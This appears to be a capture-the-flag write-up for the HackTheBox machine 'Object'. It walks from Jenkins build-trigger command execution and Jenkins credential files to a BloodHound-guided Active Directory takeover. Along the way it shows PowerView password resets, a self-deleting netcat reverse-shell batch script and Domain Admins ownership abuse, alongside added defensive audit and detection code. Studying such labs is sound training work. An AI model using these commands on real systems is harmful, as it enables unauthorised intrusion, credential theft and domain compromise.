This machine gave me another opportunity to explore how an application such as Jenkins can be leveraged to compromise a host, its environment, and even the domain. In a nutshell, the Jenkins documentation plus a bit of research was enough to gain access, and PowerView plus some Active Directory knowledge was enough to compromise the environment.
Enumeration
Service Enumeration
As in every scenario, we need to get to know our target better. We do this by finding the open ports on the host and then enumerating each service.
Finding Open Ports:
┌──(kali 👿 kali)-[~/…/Object]
└─$ sudo nmap -e tun0 -Pn -sS -p- --min-rate=1000 --min-parallelism=100 -T5 object.htb -oA Object_OpenPorts
[sudo] password for kali:
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-10 09:59 EDT
Nmap scan report for object.htb (10.129.96.147)
Host is up (0.11s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
5985/tcp open wsman
8080/tcp open http-proxy
Nmap done: 1 IP address (1 host up) scanned in 116.46 seconds
┌──(kali 👿 kali)-[~/…/Object]
└─$ sudo nmap -e tun0 -Pn -sS -sC -sV -p 80,5985,8080 --min-rate=1000 --min-parallelism=100 -T5 object.htb -oA Object_PortScan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-10 10:02 EDT
Nmap scan report for object.htb (10.129.96.147)
Host is up (0.12s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Mega Engines
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
8080/tcp open http Jetty 9.4.43.v20210629
| http-robots.txt: 1 disallowed entry
|_/
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
|_http-server-header: Jetty(9.4.43.v20210629)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.31 seconds
[1] 519316 segmentation fault sudo nmap -e tun0 -Pn -sS -sC -sV -p 80,5985,8080 --min-rate=1000 -T5 -oA
HTTP (TCP 80) Enumeration:
While evaluating what is hosted on TCP 80, we find an email address (ideas@object.htb), which hints at the domain in use.
It also contains a hyperlink to the application hosted on TCP 8080: Jenkins.
HTTP (TCP 8080) Enumeration:
The registration page is enabled, so we go ahead and create our tester:test123 account.
In the user's configuration page, we can create an API key: 192141ae5ce890dd441ab1338a0fe5e8f
This key is what lets us trigger jobs remotely.
As we have nothing else to work with here, we can create projects but not build them:
"Use the following URL to trigger build remotely: JENKINS_URL/job/Testing/build?token=TOKEN_NAME or /buildWithParameters?token=TOKEN_NAME"
As the build step to trigger, we use 'whoami /all' for testing purposes:
To trigger the job, we use curl with the URL format given in the documentation:
┌──(kali 👿 kali)-[~/…/Object]
└─$ curl -vLkX GET --url 'http://object.htb:8080/job/Testing/build?token=tester' --user 'tester:1192141ae5ce890dd441ab1338a0fe5e8f'
Note: Unnecessary use of -X or --request, GET is already inferred.
* Trying 10.129.96.147:8080...
* Connected to object.htb (10.129.96.147) port 8080 (#0)
* Server auth using Basic with user 'tester'
> GET /job/Testing/build?token=tester HTTP/1.1
> Host: object.htb:8080
> Authorization: Basic dGVzdGVyOjExOTIxNDFhZTVjZTg5MGRkNDQxYWIxMzM4YTBmZTVlOGY=
> User-Agent: curl/7.85.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 201 Created
< Date: Mon, 10 Oct 2022 15:43:14 GMT
< X-Content-Type-Options: nosniff
< Location: http://object.htb:8080/queue/item/1/
< Content-Length: 0
< Server: Jetty(9.4.43.v20210629)
<
* Connection #0 to host object.htb left intact
Successful Trigger:
And its output:
Gaining Access
Given that we can execute commands, we attempt to gain access by running a PowerShell reverse shell.
We tried to get creative, for example using PowerShell to pull a script containing the same reverse shell payload, but we only got an 'unable to connect to the remote server' error. So at this point, we need to do some research.
It turns out that Jenkins stores its encrypted credentials locally, readable WITHOUT admin access, in the directory set by the $JENKINS_HOME variable (that is the variable name on a Linux host). In this case, it is 'C:\Users\oliver\AppData\Local\Jenkins', as the error above gave us the path.
$JENKINS_HOME/credentials.xml: this file holds the encrypted credentials
$JENKINS_HOME/secrets/master.key: this file decrypts hudson.util.Secret
$JENKINS_HOME/secrets/hudson.util.Secret: this file decrypts the credentials.xml entries and is itself encrypted
Through a few more job iterations we find that this directory contains two user directories, one for the admin user and one for 'tester'. Instead of a credentials.xml file (which is the name I was expecting), we find a config.xml file that contains the encrypted credentials, as shown below:
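The storage layout just described is exactly what a defender can audit. Below is an added example (not code from the writeup) that checks a JENKINS_HOME for the two settings this box chained, open self-registration and Item.Create/Item.Build grants in config.xml, and inventories every {base64} secret in the XML tree by parsing only the v1 header (version byte, IV length, payload length) rather than decrypting anything; the sample tree it builds is constructed, with placeholder master.key and hudson.util.Secret contents.

```python
import base64, os, re, tempfile
import xml.etree.ElementTree as ET

SECRET_RE = re.compile(r"\{([A-Za-z0-9+/=]{16,})\}")   # Jenkins writes secrets as {base64}
RISKY = ("hudson.model.Item.Create", "hudson.model.Item.Build", "hudson.model.Item.Configure")

def describe_secret(blob):
    """Parse the v1 header (0x01, IV length, payload length); nothing is decrypted."""
    raw = base64.b64decode(blob)
    if raw[:1] != b"\x01" or len(raw) < 9:
        return {"format": "unknown", "bytes": len(raw)}
    iv_len, data_len = int.from_bytes(raw[1:5], "big"), int.from_bytes(raw[5:9], "big")
    return {"format": "v1-aes-cbc", "iv_len": iv_len, "data_len": data_len,
            "consistent": len(raw) == 9 + iv_len + data_len}

def security_findings(home):
    """Report the $JENKINS_HOME/config.xml settings that made this box exploitable."""
    root = ET.parse(os.path.join(home, "config.xml")).getroot()
    text = lambda el: (el.text or "").strip() if el is not None else ""
    realm, strategy = root.find("securityRealm"), root.find("authorizationStrategy")
    grants = []
    for p in (strategy.findall("permission") if strategy is not None else []):
        # matrix-auth entries look like hudson.model.Item.Build:authenticated
        # (newer versions prefix them with USER: or GROUP:), hence the split
        if any(r in text(p).split(":") for r in RISKY):
            grants.append(text(p))
    return {"use_security": text(root.find("useSecurity")) == "true",
            "signup_open": realm is not None and text(realm.find("disableSignup")) == "false",
            "strategy": strategy.get("class") if strategy is not None else None,
            "risky_grants": grants}

def encrypted_values(home):
    """Walk the tree and list every encrypted value with its file and XML element."""
    hits = []
    for dirpath, _, files in os.walk(home):
        for name in sorted(files):
            if not name.endswith(".xml"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8") as fh:
                for lineno, line in enumerate(fh, 1):
                    for blob in SECRET_RE.findall(line):
                        tag = re.search(r"<([\w.\-]+)>", line)
                        hits.append({"file": os.path.relpath(path, home).replace(os.sep, "/"),
                                     "line": lineno, "element": tag.group(1) if tag else "?",
                                     **describe_secret(blob)})
    return hits

def build_sample_home():
    """Constructed JENKINS_HOME mirroring the layout described above (not real data)."""
    home = tempfile.mkdtemp()
    for sub in ("secrets", "users/admin_1"):
        os.makedirs(os.path.join(home, *sub.split("/")))
    # well-formed v1 blob: version byte, 16-byte IV, 32-byte payload (all zeros, decrypts to nothing useful)
    blob = base64.b64encode(b"\x01" + (16).to_bytes(4, "big") + (32).to_bytes(4, "big") + bytes(48)).decode()
    files = {
        "config.xml": ('<hudson><useSecurity>true</useSecurity><securityRealm class="hudson.security.'
                       'HudsonPrivateSecurityRealm"><disableSignup>false</disableSignup></securityRealm>'
                       '<authorizationStrategy class="hudson.security.ProjectMatrixAuthorizationStrategy">'
                       '<permission>hudson.model.Item.Create:authenticated</permission>'
                       '<permission>hudson.model.Item.Build:authenticated</permission></authorizationStrategy></hudson>'),
        "secrets/master.key": "placeholder", "secrets/hudson.util.Secret": "placeholder",
        "users/admin_1/config.xml": ("<user><fullName>admin</fullName><properties>\n<username>oliver</username>\n"
                                     "<password>{%s}</password>\n</properties></user>" % blob),
    }
    for rel, body in files.items():
        with open(os.path.join(home, *rel.split("/")), "w", encoding="utf-8") as fh:
            fh.write(body)
    return home
```

Run it against a real JENKINS_HOME by calling security_findings(path) and encrypted_values(path); any secret reported in a file readable by the build user is reachable from any job, which is the whole problem on this box.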
After finding the flag, we need more information about the domain, so we proceed to enumerate users as well as local and domain groups:
*Evil-WinRM* PS C:\Users\oliver\Desktop> net user /domain
User accounts for \\
-------------------------------------------------------------------------------
Administrator Guest krbtgt
maria oliver
The command completed with one or more errors.
*Evil-WinRM* PS C:\Users\oliver\Desktop> net user maria
User name maria
Full Name maria garcia
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 10/21/2021 9:16:32 PM
Password expires Never
Password changeable 10/22/2021 9:16:32 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 10/10/2022 6:56:45 AM
Logon hours allowed All
Local Group Memberships *Remote Management Use
Global Group memberships *Domain Users
The command completed successfully.
*Evil-WinRM* PS C:\Users\oliver\Desktop> net user oliver
User name oliver
Full Name Olivar Ava
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 10/21/2021 2:23:12 AM
Password expires Never
Password changeable 10/22/2021 2:23:12 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 10/10/2022 6:56:48 AM
Logon hours allowed All
Local Group Memberships *Remote Management Use
Global Group memberships *Domain Users
The command completed successfully.
*Evil-WinRM* PS C:\Users\oliver\Desktop> net group /domain
Group Accounts for \\
-------------------------------------------------------------------------------
*Cloneable Domain Controllers
*DnsUpdateProxy
*Domain Admins
*Domain Computers
*Domain Controllers
*Domain Guests
*Domain Users
*Enterprise Admins
*Enterprise Key Admins
*Enterprise Read-only Domain Controllers
*Group Policy Creator Owners
*Key Admins
*Protected Users
*Read-only Domain Controllers
*Schema Admins
The command completed with one or more errors.
*Evil-WinRM* PS C:\Users\oliver\Desktop> net localgroup
Aliases for \\JENKINS
-------------------------------------------------------------------------------
*Access Control Assistance Operators
*Account Operators
*Administrators
*Allowed RODC Password Replication Group
*Backup Operators
*Cert Publishers
*Certificate Service DCOM Access
*Cryptographic Operators
*Denied RODC Password Replication Group
*Distributed COM Users
*DnsAdmins
*Event Log Readers
*Guests
*Hyper-V Administrators
*IIS_IUSRS
*Incoming Forest Trust Builders
*Network Configuration Operators
*Performance Log Users
*Performance Monitor Users
*Pre-Windows 2000 Compatible Access
*Print Operators
*RAS and IAS Servers
*RDS Endpoint Servers
*RDS Management Servers
*RDS Remote Access Servers
*Remote Desktop Users
*Remote Management Users
*Replicator
*Server Operators
*Storage Replica Administrators
*Terminal Server License Servers
*Users
*Windows Authorization Access Group
The command completed successfully.
For further enumeration, we used Bloodhound:
*Evil-WinRM* PS C:\Users\oliver\Desktop> upload /opt/BloodHound/Ingestors/SharpHound.ps1
Info: Uploading /opt/BloodHound/Ingestors/SharpHound.ps1 to C:\Users\oliver\Desktop\SharpHound.ps1
Data: 1297900 bytes of 1297900 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\oliver\Desktop> Set-ExecutionPolicy Bypass -Scope CurrentUser;Import-Module .\SharpHound.ps1;Import-Module .\SharpHound.ps1
*Evil-WinRM* PS C:\Users\oliver\Desktop> Invoke-BloodHound -CollectAllProperties -CollectionMethod All
*Evil-WinRM* PS C:\Users\oliver\Desktop> ls
Directory: C:\Users\oliver\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 10/10/2022 10:36 AM 9139 20221010103651_BloodHound.zip
-a---- 10/10/2022 10:36 AM 10043 MWU2MmE0MDctMjBkZi00N2VjLTliOTMtYThjYTY4MjdhZDA2.bin
-a---- 10/10/2022 10:35 AM 973425 SharpHound.ps1
-ar--- 10/10/2022 6:56 AM 34 user.txt
Of the users in this domain, only the built-in Administrator account is a member of the Domain Admins group, and only through direct membership.
From our enumeration with BloodHound, we find the user smith, who appears to be a protected user whose information oliver is not allowed to read. However, oliver holds the 'ForceChangePassword' right in the DACL of smith. This means "The user OLIVER@OBJECT.LOCAL has the capability to change the user SMITH@OBJECT.LOCAL's password without knowing that user's current password."
In turn, maria holds the 'WriteOwner' right in the DACL of the Domain Admins group. This means "The user MARIA@OBJECT.LOCAL has the ability to modify the owner of the group DOMAIN ADMINS@OBJECT.LOCAL. Object owners retain the ability to modify object security descriptors, regardless of permissions on the object's DACL."
Why does all this matter? Because "The user SMITH@OBJECT.LOCAL has generic write access to the user MARIA@OBJECT.LOCAL. Generic Write access grants you the ability to write to any non-protected attribute on the target object, including "members" for a group, and "serviceprincipalnames" for a user." That chains oliver to smith, smith to maria, and maria to Domain Admins.
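To see why these three rights form a path, here is an added example (not from the writeup or from BloodHound) that walks the same edges the way BloodHound's pathfinding does; the edge list is constructed from the relationships described above and the edge descriptions paraphrase the quoted help text. It also generalises to any principal and target in the list, which is what a defender runs against a real export to find chains like this one first.

```python
from collections import deque

# Edge types we walk and what each lets the holder do (descriptions follow the
# BloodHound help text quoted above; MemberOf is walked because group rights
# apply to every member).
EDGE_TYPES = {
    "MemberOf": "inherits every right granted to the group",
    "ForceChangePassword": "reset the target's password without knowing it",
    "GenericWrite": "write any non-protected attribute (e.g. scriptPath, servicePrincipalName)",
    "GenericAll": "full control of the object",
    "WriteOwner": "become owner, then rewrite the DACL",
    "WriteDacl": "rewrite the DACL",
    "Owns": "rewrite the DACL regardless of its current ACEs",
    "AddMember": "add members to the group",
}

# Constructed edge list mirroring what BloodHound reported on this box
# as (holder, edge type, target); it is not a real BloodHound export.
EDGES = [
    ("OLIVER@OBJECT.LOCAL", "ForceChangePassword", "SMITH@OBJECT.LOCAL"),
    ("SMITH@OBJECT.LOCAL", "GenericWrite", "MARIA@OBJECT.LOCAL"),
    ("MARIA@OBJECT.LOCAL", "WriteOwner", "DOMAIN ADMINS@OBJECT.LOCAL"),
    ("ADMINISTRATOR@OBJECT.LOCAL", "MemberOf", "DOMAIN ADMINS@OBJECT.LOCAL"),
    ("MARIA@OBJECT.LOCAL", "MemberOf", "REMOTE MANAGEMENT USERS@OBJECT.LOCAL"),
]

def adjacency(edges):
    """holder -> [(edge type, target)] for the edge types we know how to walk."""
    graph = {}
    for holder, kind, target in edges:
        if kind in EDGE_TYPES:
            graph.setdefault(holder, []).append((kind, target))
    return graph

def shortest_path(edges, start, target):
    """Breadth-first search; returns the hops as (holder, edge, target) or None."""
    graph, seen = adjacency(edges), {start}
    queue = deque([(start, [])])
    while queue:
        node, path = queue.popleft()
        if node == target:
            return path
        for kind, nxt in graph.get(node, []):
            if nxt not in seen:
                seen.add(nxt)
                queue.append((nxt, path + [(node, kind, nxt)]))
    return None

def principals_reaching(edges, target):
    """Every principal with a path to target, mapped to its hop count."""
    result = {}
    for holder in sorted({h for h, _, _ in edges}):
        path = shortest_path(edges, holder, target)
        if path:
            result[holder] = len(path)
    return result

def explain(path):
    """Render a path as the sequence of actions a defender should expect to see."""
    return [f"{h} --{k}--> {t}: {EDGE_TYPES[k]}" for h, k, t in path]
```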
Validating the Remote Management Users group to figure out which accounts WinRM is accessible to:
*Evil-WinRM* PS C:\Users\oliver\Desktop> net localgroup "Remote Management Users"
Alias name Remote Management Users
Comment Members of this group can access WMI resources over management protocols (such as WS-Management via the Windows Remote Management service). This applies only to WMI namespaces that grant access to the user.
Members
-------------------------------------------------------------------------------
maria
oliver
smith
The command completed successfully.
Account Modification
Modifying smith's password using PowerView:
*Evil-WinRM* PS C:\Users\oliver\Desktop> Import-Module .\PowerView.ps1
*Evil-WinRM* PS C:\Users\oliver\Desktop> $NewPassword = ConvertTo-SecureString 'test123' -AsPlainText -Force
*Evil-WinRM* PS C:\Users\oliver\Desktop> Set-DomainUserPassword -Identity 'smith' -AccountPassword $NewPassword
Warning: [Set-DomainUserPassword] Error setting password for user 'smith' : Exception calling "SetPassword" with "1" argument(s): "The password does not meet the password policy requirements. Check the minimum password length, password complexity and password history requirements. (Exception from HRESULT: 0x800708C5)"
*Evil-WinRM* PS C:\Users\oliver\Desktop> $NewPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
*Evil-WinRM* PS C:\Users\oliver\Desktop> Set-DomainUserPassword -Identity 'smith' -AccountPassword $NewPassword
Testing the modification:
┌──(kali 👿 kali)-[~/…/Object]
└─$ evil-winrm -i object.htb -u 'smith' -p 'Password123!'
Evil-WinRM shell v3.4
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\smith\Documents> whoami /all
USER INFORMATION
----------------
User Name SID
============ ==============================================
object\smith S-1-5-21-4088429403-1159899800-2753317549-1104
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
*Evil-WinRM* PS C:\Users\smith\Documents>
Now that we have access as smith, we will use netcat through a batch script to get a reverse shell as maria.
Custom batch script:
@echo off
start /b C:\Windows\Temp\nc.exe 127.0.0.1 1337 -e cmd.exe
start /b "" cmd /c del "%~f0"&exit /b
In PowerShell, we use PowerView to modify the account so that it executes this script:
As soon as we get a reverse shell thanks to this script, we can access all the files in maria's home directory, which contains an Excel spreadsheet with a list of passwords:
Testing maria's passwords and access:
To test these passwords, we will use crackmapexec:
*Evil-WinRM* PS C:\Users\maria\Documents> whoami /all
USER INFORMATION
----------------
User Name SID
============ ==============================================
object\maria S-1-5-21-4088429403-1159899800-2753317549-1106
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
*Evil-WinRM* PS C:\Users\maria\Documents> upload /usr/share/windows-resources/powersploit/Recon/PowerView.ps1
Info: Uploading /usr/share/windows-resources/powersploit/Recon/PowerView.ps1 to C:\Users\maria\Documents\PowerView.ps1
Data: 1027036 bytes of 1027036 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\maria\Documents>
This output does not say much of value, but we already know maria can modify the ownership of the Domain Admins group (dangerous!!).
Modifying Group Ownership
First, since we want to confirm this again, we try to find any 'interesting DACLs':
Again with PowerView, we change the owner to maria, which allows us to add new ACLs:
*Evil-WinRM* PS C:\Users\maria\Documents> Set-DomainObjectOwner -Identity 'Domain Admins' -OwnerIdentity 'maria' -Verbose
Verbose: [Get-DomainSearcher] search base: LDAP://DC=object,DC=local
Verbose: [Get-DomainObject] Get-DomainObject filter string: (&(|(|(samAccountName=maria)(name=maria)(displayname=maria))))
Verbose: [Get-DomainSearcher] search base: LDAP://DC=object,DC=local
Verbose: [Get-DomainObject] Get-DomainObject filter string: (&(|(|(samAccountName=Domain Admins)(name=Domain Admins)(displayname=Domain Admins))))
Verbose: [Set-DomainObjectOwner] Attempting to set the owner for 'Domain Admins' to 'maria'
Now that maria is the owner, we can add a new ACL granting full control of the group and then add this account as a member of 'Domain Admins', giving us Domain Administrator access:
*Evil-WinRM* PS C:\Users\maria\Documents> Add-DomainObjectAcl -TargetIdentity "Domain Admins" -PrincipalIdentity maria -Rights All
*Evil-WinRM* PS C:\Users\maria\Documents> Add-DomainGroupMember -Identity 'Domain Admins' -Members maria
*Evil-WinRM* PS C:\Users\maria\Documents> net group "Domain Admins" /domain
Group name Domain Admins
Comment Designated administrators of the domain
Members
-------------------------------------------------------------------------------
Administrator maria
The command completed successfully.
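The three changes just made (owner rewrite, new ACE, member added) each leave a trace on the domain controller. The following is an added detection example, not part of the writeup, that correlates Security-log events in the shape of 5136 (directory object modified) and 4728 (member added to a security-enabled global group); the sample events, timestamps and the Administrator SID placeholder are constructed, while maria's SID is the one from the whoami output above.

```python
from collections import defaultdict
from datetime import datetime, timedelta

PRIVILEGED = {"domain admins", "enterprise admins", "schema admins", "administrators"}
DA_DN = "CN=Domain Admins,CN=Users,DC=object,DC=local"
MARIA_SID = "S-1-5-21-4088429403-1159899800-2753317549-1106"   # maria's SID from the whoami output above

def sd_event(time, op, subject="maria", sid=MARIA_SID, dn=DA_DN):
    """One 5136 (directory object modified) event that touches the security descriptor."""
    return {"EventID": 5136, "Time": time, "SubjectUserName": subject, "SubjectUserSid": sid,
            "ObjectDN": dn, "ObjectClass": "group", "OperationType": op,
            "AttributeLDAPDisplayName": "nTSecurityDescriptor"}

# Constructed sample events in the shape of the Security log's EventData fields, not a real
# export. A descriptor change is logged as a 5136 pair (%%14675 = value deleted, %%14674 =
# value added): one pair for the owner change and one for the new ACE, then the 4728 add.
EVENTS = [
    sd_event("2022-10-10T10:58:01", "%%14675"), sd_event("2022-10-10T10:58:01", "%%14674"),
    sd_event("2022-10-10T10:58:40", "%%14675"), sd_event("2022-10-10T10:58:40", "%%14674"),
    {"EventID": 4728, "Time": "2022-10-10T10:59:05", "SubjectUserName": "maria",
     "SubjectUserSid": MARIA_SID, "TargetUserName": "Domain Admins", "MemberSid": MARIA_SID,
     "MemberName": "CN=maria garcia,CN=Users,DC=object,DC=local"},
    {"EventID": 5136, "Time": "2022-10-10T11:20:00", "SubjectUserName": "Administrator",
     "SubjectUserSid": "S-1-5-21-PLACEHOLDER-500", "ObjectDN": "CN=oliver,CN=Users,DC=object,DC=local",
     "ObjectClass": "user", "AttributeLDAPDisplayName": "description", "OperationType": "%%14674"},
]

def group_of(dn):
    """Value of the first RDN, e.g. 'Domain Admins' for DA_DN."""
    rdn = dn.split(",", 1)[0]
    return rdn[3:] if rdn.upper().startswith("CN=") else rdn

def detect(events, window=timedelta(minutes=10)):
    """Return (kind, subject, group) alerts in time order.

    sd-rewrite     a privileged group's nTSecurityDescriptor changed (owner or DACL)
    member-add     an account was added to a privileged group
    self-add       the subject added their own account
    takeover-chain a member-add preceded, within `window`, by the same subject
                   rewriting that group's descriptor: the sequence used above
    """
    alerts, last_sd = [], defaultdict(dict)              # last_sd[subject][group] = time
    for e in sorted(events, key=lambda ev: ev["Time"]):
        t, subj = datetime.fromisoformat(e["Time"]), e["SubjectUserName"]
        if (e["EventID"] == 5136 and e["AttributeLDAPDisplayName"] == "nTSecurityDescriptor"
                and group_of(e["ObjectDN"]).lower() in PRIVILEGED):
            group = group_of(e["ObjectDN"])
            if group not in last_sd[subj]:                   # one alert per subject and group
                alerts.append(("sd-rewrite", subj, group))
            last_sd[subj][group] = t
        elif e["EventID"] == 4728 and e["TargetUserName"].lower() in PRIVILEGED:
            group = e["TargetUserName"]
            seen = last_sd[subj].get(group)
            if seen is not None and t - seen <= window:
                kind = "takeover-chain"
            elif e["MemberSid"] == e["SubjectUserSid"]:
                kind = "self-add"
            else:
                kind = "member-add"
            alerts.append((kind, subj, group))
    return alerts
```

Feeding the same logic a real export requires only mapping the EventData fields to the keys used here; the 5136 events exist only when "Audit Directory Service Changes" is enabled and a SACL covers the privileged groups.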
For this new membership to take effect, we need a new logon session, so we connect as maria once more and validate:
┌──(kali 👿 kali)-[~/…/Object]
└─$ evil-winrm -i object.htb -u 'maria' -p 'W3llcr4ft3d_4cls'
Evil-WinRM shell v3.4
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\maria\Documents> whoami /all
USER INFORMATION
----------------
User Name SID
============ ==============================================
object\maria S-1-5-21-4088429403-1159899800-2753317549-1106
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
============================================= ================ ============================================= ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators Alias S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
OBJECT\Domain Admins Group S-1-5-21-4088429403-1159899800-2753317549-512 Mandatory group, Enabled by default, Enabled group
OBJECT\Denied RODC Password Replication Group Alias S-1-5-21-4088429403-1159899800-2753317549-572 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
SeMachineAccountPrivilege Add workstations to domain Enabled
SeSecurityPrivilege Manage auditing and security log Enabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemProfilePrivilege Profile system performance Enabled
SeSystemtimePrivilege Change the system time Enabled
SeProfileSingleProcessPrivilege Profile single process Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled
SeCreatePagefilePrivilege Create a pagefile Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeDebugPrivilege Debug programs Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeEnableDelegationPrivilege Enable computer and user accounts to be trusted for delegation Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
SeCreateSymbolicLinkPrivilege Create symbolic links Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
*Evil-WinRM* PS C:\Users\maria\Documents> Get-ChildItem -Path C:\Users\Administrator\ -Recurse
Directory: C:\Users\Administrator
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 8/24/2021 7:51 AM 3D Objects
d-r--- 8/24/2021 7:51 AM Contacts
d-r--- 12/16/2021 9:11 AM Desktop
d-r--- 10/25/2021 8:40 PM Documents
d-r--- 10/22/2021 3:33 AM Downloads
d-r--- 8/24/2021 7:51 AM Favorites
d-r--- 8/24/2021 7:51 AM Links
d-r--- 8/24/2021 7:51 AM Music
d-r--- 8/24/2021 7:51 AM Pictures
d-r--- 8/24/2021 7:51 AM Saved Games
d-r--- 8/24/2021 7:51 AM Searches
d-r--- 8/24/2021 7:51 AM Videos
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 10/10/2022 6:56 AM 34 root.txt
Directory: C:\Users\Administrator\Favorites
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 8/24/2021 7:51 AM Links
-a---- 8/24/2021 7:51 AM 208 Bing.url
Directory: C:\Users\Administrator\Links
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 8/24/2021 7:51 AM 518 Desktop.lnk
-a---- 8/24/2021 7:51 AM 975 Downloads.lnk
As we can see, we can now access everything on the system, including the contents of the Administrator's home directory. Let's continue and retrieve the root flag as if this were part of the OSCP (using ipconfig and type):